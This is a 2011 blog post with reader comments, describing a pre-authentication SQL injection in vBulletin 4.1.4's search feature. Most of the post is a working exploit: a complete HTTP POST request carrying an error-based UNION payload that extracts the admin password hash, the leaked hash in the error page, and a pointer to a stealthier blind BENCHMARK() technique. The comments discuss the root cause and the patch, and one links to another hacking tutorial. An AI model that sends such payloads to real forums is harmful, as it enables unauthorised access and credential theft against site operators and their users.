Wednesday, July 20, 2011

vBulletin "Search UI" SQL Injection: Take Two

It looks like someone has found another SQL Injection bug in the vBulletin "Search UI". After taking a quick look @ the bug, I have determined it to be exploitable, pre auth.

The actual SQL Injection lies within the add_advanced_search_filters() function. This is due to vBulletin not sanitizing the "messagegroupid" and "categoryid" arrays before implode()'ing them directly into a SQL query.

Exploiting this issue is fairly straight forward, but is pretty much a blind SQL Injection as far as I can tell in the small amount of time I have looked at it. However, using the methods outlined here, one can easily extract data at the expense of possibly tipping off the database admin. This is because vBulletin displays the verbose SQL query within HTML comments whenever displaying an SQL error screen. (Even for non authenticated users)

1:  POST /search.php?do=process HTTP/1.1  
2:  Host: 127.0.0.1  
3:  Content-Type: application/x-www-form-urlencoded  
4:  humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*  

The above post query will successfully display the passsword hash for the userid=1 within the comments of the SQL error page used by vBulletin, as seen in the example below.

1:  <!--  
2:  Database error in vBulletin 4.1.4:  
3:  Invalid SQL:  
4:                           SELECT socialgroupcategory.title  
5:                           FROM socialgroupcategory AS socialgroupcategory  
6:                           WHERE socialgroupcategory.socialgroupcategoryid IN (-99) union select password from user where userid=1 and row(1,1)&gt;(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*);  
7:  MySQL Error  : Duplicate entry '4c62730e24e31ab9a0b8229a7ff72836:1' for key 'group_key'  
8:  Error Number : 1062  
9:  Request Date : Wednesday, July 20th 2011 @ 10:24:59 PM  
10:  Error Date  : Wednesday, July 20th 2011 @ 10:24:59 PM  
11:  Script    : http://127.0.0.1/search.php?do=process  
12:  Referrer   :   
13:  IP Address  : 127.0.0.1  
14:  Username   : Unregistered  
15:  Classname   : vB_Database  
16:  MySQL Version :   
17:  -->  

And of course if you prefer to exploit this in a more stealthy manner, there is always a blind SQL Injection approach using timed BENCHMARK() queries, etc. that will likely work for you.

8 comments:

  1. This comment has been removed by the author.

    ReplyDelete
  2. Quote:"This is due to vBulletin not sanitizing the "messagegroupid" and "categoryid" arrays before implode()'ing them directly into a SQL query."

    Actually, the input IS sanitized with the vBulletin "GPC" function, which filters (actually converts most) bad characters.

    The query looks like this:
    SELECT socialgroup.name FROM socialgroup AS socialgroup WHERE socialgroup.groupid IN ($value);

    The problem is that "GPC", does not filter paranthesis, which could've prevented this exploit. GPC does filter ' and " (apostrophes and quotes), but it does not filter ( and ). (This function also filters >, < and a lot more characters used for various exploitation vectors.)

    In other words, the security in this SQL call, is simply implemented WRONG.

    Nice to see you got it working without authentication, which makes this exploit even a greater risk.

    ReplyDelete
  3. @MaXe:"Actually, the input IS sanitized with the vBulletin "GPC" function, which filters (actually converts most) bad characters."

    Not for arrays though. Here is an example query simply causing an error to show you most characters are not being filtered.

    Invalid SQL:

    SELECT socialgroupcategory.title
    FROM socialgroupcategory AS socialgroupcategory
    WHERE socialgroupcategory.socialgroupcategoryid IN (1) OR `foo`='bar' -- /*);

    MySQL Error : Unknown column 'foo' in 'where clause'

    ReplyDelete
  4. Also, if you look @ the latest patch, you will see that the vuln params were converted from ARRAY to ARRAY_UINT as a means to prevent this issue.

    ReplyDelete
  5. i cant understant how to apply this exploit on vbulletin

    ReplyDelete
  6. i cant understant how to apply this exploit on vbulletin

    ReplyDelete
  7. They should be using parameterized queries so it couldn't be exploited. Bind the parameters instead of putting the id in blindly.

    ReplyDelete
  8. What you doin'? I thought u would give nice tutorial. :(

    I think this tutorial more clear: http://www.lo0.ro/2011/hacking-vbulletin-4-0-3-4-1-2-how-to-by-cross/

    ReplyDelete